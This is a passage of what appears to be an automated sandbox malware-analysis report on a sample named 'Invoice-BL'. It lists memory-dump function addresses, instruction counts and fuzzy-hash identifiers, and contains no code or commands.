Opcode Fuzzy Hash: d76c2e4bdb06b4830adede257f5eaf97f3f344f420f91696d2c8c4f5e3d7da08
Instruction Fuzzy Hash: 10116D75F002158FCB09EB6DD954AAEBBF6EB88704F144139E909EB349DB729D018B90

Function 0131C882 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9202c1b9cee915877106d3d6079acdaeb1b51d7c39f9476b102782be897f43d
Instruction ID: 4e0d748f9ca876c0bb7d2262f9a72799614799fe2f0d5901ace46f2801f376bc
Opcode Fuzzy Hash: d9202c1b9cee915877106d3d6079acdaeb1b51d7c39f9476b102782be897f43d
Instruction Fuzzy Hash: FD115171E107069FDB18CFA4C8456DEBBB6FF89310F159629E401BB600EB74A986CB80

Function 0131EE67 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f303706bc27e793bd33ea45319db15d371fae7193f55df7d3a8c171108f0bed
Instruction ID: 37c768493b7f32c6ffaa8e7babbc7889c27c667fc62eec79ab7c0f067e7f6e20
Opcode Fuzzy Hash: 2f303706bc27e793bd33ea45319db15d371fae7193f55df7d3a8c171108f0bed
Instruction Fuzzy Hash: 8611E671B0022A8FCF15DF6C99402AEFBA5AB88254B108376DD08D7699E731D9028BE1

Function 01313177 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46ab1a40b722f86f6f3c28db39e61c22fb4a42925e1715cb076d1785b91f9936
Instruction ID: 54d4a788ece26588adee2f9cb35a29f28f142ed06a1d293d8707499dd2a6986a
Opcode Fuzzy Hash: 46ab1a40b722f86f6f3c28db39e61c22fb4a42925e1715cb076d1785b91f9936
Instruction Fuzzy Hash: 1B115934A04215CFDB28AF78C4146ED77B6BF89319F10053DD202AB668DB399802CB95

Function 01313188 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7d6afcf17eb7fe9d2a9ee2a62b6b6901a01b19e142288e4e5b653688d4ff4bd
Instruction ID: a995ef656a7b4a9fc0d58f7b5348f9ad4e9aac52ff4565945ec9e31c283dd292
Opcode Fuzzy Hash: f7d6afcf17eb7fe9d2a9ee2a62b6b6901a01b19e142288e4e5b653688d4ff4bd
Instruction Fuzzy Hash: 86215C346042198FDB18BF78C5147AE7BB6BF4C219F100428D202AB798DF759905CBA6

Function 0131B7E0 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c18c1fa5ab37300e16c28401b532ff826a68b84482a4b330aaa1ad4d5913c32
Instruction ID: 1dd078360d9c6d1f2099b6829df217071b0dac3909cfe1de591d56cfd4962e5b
Opcode Fuzzy Hash: 8c18c1fa5ab37300e16c28401b532ff826a68b84482a4b330aaa1ad4d5913c32
Instruction Fuzzy Hash: 23119A35B102149FCB05AF68A8596AEBFFAEB88704F014129E906D7348EF718D01CBD0

Function 01316890 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d7c78d02ab48ecfbc11f2e10cc88f0d7e73c5ea6150ea281e3e2159be78bbc
Instruction ID: ad3410895cd91cf90613478cb344ddfe83a288ad98c45a202d3ec4d69dfe6bd0
Opcode Fuzzy Hash: 88d7c78d02ab48ecfbc11f2e10cc88f0d7e73c5ea6150ea281e3e2159be78bbc
Instruction Fuzzy Hash: D0115C74600219CFDB18ABB9C6157AE7BF6AF4D209F100468D602AB79CDB759801CBA6

Function 01311CC8 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83fface91757d8102666dfaf810d5131c0f9d332c1ebcb0245b608b494b0d590
Instruction ID: 7968be503162c9adb41127a07080b7f734973f0660fe129debd42ebd4100639b
Opcode Fuzzy Hash: 83fface91757d8102666dfaf810d5131c0f9d332c1ebcb0245b608b494b0d590
Instruction Fuzzy Hash: 7411C274A00215CFCBA9FB79C4045AEB7FAEF886147614979D106CB719EB39DC02CB90

Function 0131C890 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9ed3132c31fc5da9b6c49b3708cbffd2f5f6001fcfc492807b6b5e2bad2ec3
Instruction ID: a69f84f9fe9f2cec762de3607d78b49a8cca889805e5f1a2040352d949f7f06d
Opcode Fuzzy Hash: 4c9ed3132c31fc5da9b6c49b3708cbffd2f5f6001fcfc492807b6b5e2bad2ec3
Instruction Fuzzy Hash: 4D117071E1034AAFDB18CFA5C84559EFFB6FF89310F255629E401BB240EB70A985CB80

Function 0131F212 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ef8324a9b72eef7614b96d1325921610ead764c9811b552e61ade4cdbae2fb
Instruction ID: 20e14f86c9eb3be3045dbb2908d7a09cdcf8d45343f45d5050bd723839842d50
Opcode Fuzzy Hash: 42ef8324a9b72eef7614b96d1325921610ead764c9811b552e61ade4cdbae2fb
Instruction Fuzzy Hash: DD117079B101298BDF54DFA9D5402EF7BE9AB88210B104276D909E3649E730CD038BD1

Function 01316880 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 772af3fc086c830a1d2097a4a45e631f309f86b45def00697d2d50a487768697
Instruction ID: 3951c918806177ce4a35283a3acde6b0528e5f31d63ef493a3dfea223d0efb3e
Opcode Fuzzy Hash: 772af3fc086c830a1d2097a4a45e631f309f86b45def00697d2d50a487768697
Instruction Fuzzy Hash: B3118E74600225CFDB18AB78C6156ED77B2AF4C309F10046CD602AB7A9DB769C02CBA5

Function 012BD49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4114849761.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_12bd000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 2b81ee1c81a3e0d42d52e8539eccfd332ca846713a72e44c265d3f00512a4314
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 71110376904245CFDB12CF48D5C4B96BF72FB84328F24C1A9DA090B257C336D45ACBA2

Function 0131802F Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b9fe20db80549185ef5b0329455e2173199aea520ab52bc126cefef26f68774
Instruction ID: f795958671cfadc387298d0a07a1b248487492eefde6910cb31a44577564d90e
Opcode Fuzzy Hash: 6b9fe20db80549185ef5b0329455e2173199aea520ab52bc126cefef26f68774
Instruction Fuzzy Hash: D411CC38F1021B9BCF48EF64F56857E7B76EB88740B108915E9125B798EF34AC029B84

Function 0131B0B0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e378c579294aa1568257288674cb803cc9406c85502f84903504cf5b32db4db1
Instruction ID: 0cf48292498f8222a8f05a5cc6c4c6aa42a3cbcc4da46e94c521110c47047f6f
Opcode Fuzzy Hash: e378c579294aa1568257288674cb803cc9406c85502f84903504cf5b32db4db1
Instruction Fuzzy Hash: AC0181363141140FCB08A6BEB85467EB7EADBC8676B60853AE50EC3349DE65CC454790

Function 01311CD8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf03ee8e72969f36bbf68722b07d52509cb0f5b28a4d34b3d134363427374796
Instruction ID: 221f86b8e3e6af354b49b09ad1e10965c9570f074e6ad0871181431740e82ade
Opcode Fuzzy Hash: bf03ee8e72969f36bbf68722b07d52509cb0f5b28a4d34b3d134363427374796
Instruction Fuzzy Hash: 3D11A174B002158FCBA9FBB9D40466ABBF6AF886017604879D506CB318EB35DC02CB90

Function 0131B071 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d7b78768edf5705f92eea89a60707b13595abbcf32dae6dcc20de569cf1faab
Instruction ID: 88ed3ad4a0855bcfad29938efcf9b6002789f67af58fc8dd4c775809adf85aa3
Opcode Fuzzy Hash: 7d7b78768edf5705f92eea89a60707b13595abbcf32dae6dcc20de569cf1faab
Instruction Fuzzy Hash: BB012B3B7592108FCB02876DEC4519CB7B4EFC123A74985BAD449CB25BC7698817CBD0

Function 01311E80 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2953665ecd811671106b2f17a03b9a4d03d3d4f593bc12ce1a853fde1eeb53c
Instruction ID: 444fed0c45b372525dea81fdb74d795ae6605598b20cc4709a38b6538b4800ec
Opcode Fuzzy Hash: e2953665ecd811671106b2f17a03b9a4d03d3d4f593bc12ce1a853fde1eeb53c
Instruction Fuzzy Hash: 71111C78A10318EFCB06EFB4D94479DBBB2EB88301F2081A9D90997355DB395E91DF40

Function 0131804B Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3eb26d96438abec86538f78bfbaaf0982f13458b169176a756f7dcfa907ce52e
Instruction ID: 2208f0accf2b865c48cb5d5edac6f1a69648087bf503aa87de53488271db7bd6
Opcode Fuzzy Hash: 3eb26d96438abec86538f78bfbaaf0982f13458b169176a756f7dcfa907ce52e
Instruction Fuzzy Hash: 27110D38F1021A8BCB48EF64F56857E7B76EB88700B108915E9125B798EF34AC02DB84

Function 0131D2D0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0496531a575c70b21e04d0bc24f29e0471e26f4ebbc2aa30f2c73f289e88762f
Instruction ID: 2f986b61274318d2a1663b05e7fe187261190994544bb99d9534a68d8663ba3f
Opcode Fuzzy Hash: 0496531a575c70b21e04d0bc24f29e0471e26f4ebbc2aa30f2c73f289e88762f
Instruction Fuzzy Hash: 2401DBB1E112148FCB58CEAD95812EEFBE6FFC4210B24C13AD10AE3644E63449018790

Function 01311E90 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c22bcd1772fd0c4ec40b66193bd11fd1762c9da8b1d48983b746937c1b19f3e
Instruction ID: a673f481e4313919356a65bc063a7618f517fa54fcf9d8f3f98cfd78e4c2c049
Opcode Fuzzy Hash: 7c22bcd1772fd0c4ec40b66193bd11fd1762c9da8b1d48983b746937c1b19f3e
Instruction Fuzzy Hash: 56110078A10218EFCB05EBA5D54479DBBB6EB8C302F208158990953354DF395E51EB40

Function 0131B138 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53e236a3f76ebf0280d446824d0f979381977f7d3f4fb0657e754056207976e2
Instruction ID: 341782e4fb889da908d1b9039678e2e68c00057a917787c78fdd32d59466ba49
Opcode Fuzzy Hash: 53e236a3f76ebf0280d446824d0f979381977f7d3f4fb0657e754056207976e2
Instruction Fuzzy Hash: 1101A4B1E442198FCB45DFA8D9811EEBBF4EF49224B000179C509F7749E7345D15CBA1

Function 0131F2B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1136d8808b37947f5203a1b7da605b57e62f112d3a0e5b8007fbbc974c6718d
Instruction ID: 98b0249ba7efa84d3767d2b444ea48d03b88698087b8d8b95ba7e4fbc83d5352
Opcode Fuzzy Hash: a1136d8808b37947f5203a1b7da605b57e62f112d3a0e5b8007fbbc974c6718d
Instruction Fuzzy Hash: 5F01A274E0421A8FCB40EFBDE4815DEBBF8EB48224B10863AD508E3604EB3489068F90

Function 01317588 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6500d73ba09d795a7133fd4382110e669f773e91e2605566518c72d278f8776
Instruction ID: 748175a98765f21b250aa175a2736b62034dce8c07d647ae281c3943c5ab3828
Opcode Fuzzy Hash: c6500d73ba09d795a7133fd4382110e669f773e91e2605566518c72d278f8776
Instruction Fuzzy Hash: B4016278E00115CFCB18EF29F9455B93BB0FB89215B04426DD90AC3E19FB399822CB51

Function 0131B7D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d52f2966346b4dfad0358d3e8a7fd7a04abd9dcd34b0cec195737a413ab90fe
Instruction ID: 08048a76044a2b25208e1af9157541c7d88ebec4487509cb9fc10bfa90844d83
Opcode Fuzzy Hash: 8d52f2966346b4dfad0358d3e8a7fd7a04abd9dcd34b0cec195737a413ab90fe
Instruction Fuzzy Hash: 8DF0AF71E402158F8B45EA6CA8401FEBBF5EBC9220700423AD549D3604E7354D128BC1

Function 0131AEB8 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0de72d287823fe35799907d3cb9cc196d29c908d71e26ada5c6c7ca50bf1442e
Instruction ID: 05e19fe67dbb0fb981f8246b6385428865331bba59e701a5a0a580c30b6f12bc
Opcode Fuzzy Hash: 0de72d287823fe35799907d3cb9cc196d29c908d71e26ada5c6c7ca50bf1442e
Instruction Fuzzy Hash: E6F0CDB4A40219DFCB44DFA9A8814EEBBB8FB8D325B00017DE509E7645EB354D068BA1

Function 0131E7D8 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9a094c2d66d881150e90237a5f288fe18ac6ca6abbadc2d6a574cc444674179
Instruction ID: 50b1109a9a019212f8d1f38118e60233ec3c468b76f0b65ac9dbf5f3462e5cad
Opcode Fuzzy Hash: a9a094c2d66d881150e90237a5f288fe18ac6ca6abbadc2d6a574cc444674179
Instruction Fuzzy Hash: A6F0D175E002198FCB95EFA8D98059EBBF0EB88254B10017EC908E7309E3319D05CB90

Function 0131B6C9 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c2400775ccada6fdcc9552145584bbb86951503c29f3b2d2b52bcb117291c4
Instruction ID: aa7584d591e7ff122eb5fd1cd35909ac539828476781aade7b2c135c1fc48bb1
Opcode Fuzzy Hash: 70c2400775ccada6fdcc9552145584bbb86951503c29f3b2d2b52bcb117291c4
Instruction Fuzzy Hash: B7F0A4B5E002268FCB54DBA8E5815EEBBF4EF48225B04466AD608F7209E73099058BD1

Function 01318800 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6683a9c24e2dec8dfa1c8415f86520a3b6fb2c8c5a5976cb696fc3eb7ac7ce
Instruction ID: 1812367ea749d983c0e542a80875c8366b0a12b62e0ddaf1947b02a90f2e3c83
Opcode Fuzzy Hash: 5d6683a9c24e2dec8dfa1c8415f86520a3b6fb2c8c5a5976cb696fc3eb7ac7ce
Instruction Fuzzy Hash: 07014F71D0474ACBDB09DFE1C8406DEBBB2BF85304F214559D805BB215D7709945CB80

Function 0131807E Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18b704663b2e88aa3d69595fd71ba5734726dd26e231931b37f86075048635c9
Instruction ID: 7ed8e8cb248e59e77581f56732cf683ddfd76485af2c3175fa67b5c272ddf7c1
Opcode Fuzzy Hash: 18b704663b2e88aa3d69595fd71ba5734726dd26e231931b37f86075048635c9
Instruction Fuzzy Hash: E7012138F1021A8BCB48EF64F56957E7B76EB84700B108914F9125B798EF34AC02DB84

Function 0131F052 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e61d1fd1c8b1cd45c4aaaf9deac5af17d22eb069b3000216d241a66f6c5b11
Instruction ID: d6cda4d6950542d393a40a98e6924523e6b16fc9733da9cc20f02afd29bc0c4a
Opcode Fuzzy Hash: 14e61d1fd1c8b1cd45c4aaaf9deac5af17d22eb069b3000216d241a66f6c5b11
Instruction Fuzzy Hash: EAF0B435B002295BCF05AA6DE89149EB7B9EB88354B00467AE509DB349EF30AC0987C1

Function 0131B551 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8320b4ab5f236ea8bc560ec9c9b74ad99a5ceb00f420f8aa823b8e0ebbb335af
Instruction ID: 41559c1f20ada887b3e83d92f2eca339ca2dbd7e5697c2767c504056198fa960
Opcode Fuzzy Hash: 8320b4ab5f236ea8bc560ec9c9b74ad99a5ceb00f420f8aa823b8e0ebbb335af
Instruction Fuzzy Hash: CDF062B5E0421A9FCF44DFF8A5811EEBBB4EB48224B00053AD509F3609E73499458B90

Function 013174B9 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d5b4f0a8f3b8434ee72c165170cc6cc9364cd3ade53f44d2b884ac88beb824
Instruction ID: 505baeea30e2b6891f5b98a9fdc56002caf3972ab31099f1c63cdc984d3b6d11
Opcode Fuzzy Hash: 52d5b4f0a8f3b8434ee72c165170cc6cc9364cd3ade53f44d2b884ac88beb824
Instruction Fuzzy Hash: 59F0AFB81402629FC744EF68E980A997BF6EF4A311B1146A4E049C7269EB35AD26CB50

Function 01311144 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4c7a0f7a5951680b5d1349af65cb539aadc13e5e108febbd2fc4e5a114dc239
Instruction ID: fc209f3b150a9519e3f6236348c94ae0f47454ab6685b18c7c92d2be609b51ea
Opcode Fuzzy Hash: f4c7a0f7a5951680b5d1349af65cb539aadc13e5e108febbd2fc4e5a114dc239
Instruction Fuzzy Hash: 83F0F079608270CFCB13EB76E4201A83BA1FF892017104AA6C106CB30DEB359D1ACB86

Function 01317539 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d4784a952050003f00d384a87f51819a04b493ef98dff74e9ea1b9d1e950f5
Instruction ID: e5a12cea32c8d4601ee4b3e330d29b0e5df1c5c21d97a922a85b3d6c45a84ae1
Opcode Fuzzy Hash: 63d4784a952050003f00d384a87f51819a04b493ef98dff74e9ea1b9d1e950f5
Instruction Fuzzy Hash: 64E0DF767491924FC74D26AE24610BE37DA8FCB175329016BE809DFB84DE2C8C8383D2

Function 01317460 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c54d90cf006a08698393f123688a4341bf853f2659ceb06202f2b6c1e6a34a4
Instruction ID: ed8fda5cab4ac38a2d53a7cdb75b4f336aaca19ae62d0ac91aed9da172cf6916
Opcode Fuzzy Hash: 4c54d90cf006a08698393f123688a4341bf853f2659ceb06202f2b6c1e6a34a4
Instruction Fuzzy Hash: 32F02B303002764FC7166674A4111AD3BED8F8A965B1500AADA06C779AEF59DC0747C5

Function 013174C8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26bae1a83385d0d1329327133038710608a2e2cb40c4253e57ab16cf77303c44
Instruction ID: ca07150b7b9cff424e39cbd753fbac521d74508c4ea881ab5693468e692903f1
Opcode Fuzzy Hash: 26bae1a83385d0d1329327133038710608a2e2cb40c4253e57ab16cf77303c44
Instruction Fuzzy Hash: 64F089BC600225DFC704EF69D944A4ABBF5EF48701B104664E408C722DEB307D25CF90

Function 01311E10 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58aa09783be2e1eab55f8eba7f34e37acebbae29fa24b249297bf8039ee1f53
Instruction ID: 1d7f18d3befe7a86525f2fae740b9b0228969d4d7b6ad3240ef1dc1a048c23be
Opcode Fuzzy Hash: e58aa09783be2e1eab55f8eba7f34e37acebbae29fa24b249297bf8039ee1f53
Instruction Fuzzy Hash: 37F054785103259FCB01FF79E94494C7BB5EF55302B504B64D4088753CEF70AE568B80

Function 013180B1 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cf053b4586c8dcf0f3a699dbacaf9d753cd8ec276258157940bff3d8df13fae
Instruction ID: fca1d144aae895439afab29432ba9cf23b39bbec857ade0fa168828fd89f8a58
Opcode Fuzzy Hash: 6cf053b4586c8dcf0f3a699dbacaf9d753cd8ec276258157940bff3d8df13fae
Instruction Fuzzy Hash: 66F01234F1021A9BCB08EFA4F45957E7B76EB84741B108915F8029B798EF34AC029B84

Function 0131EF88 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

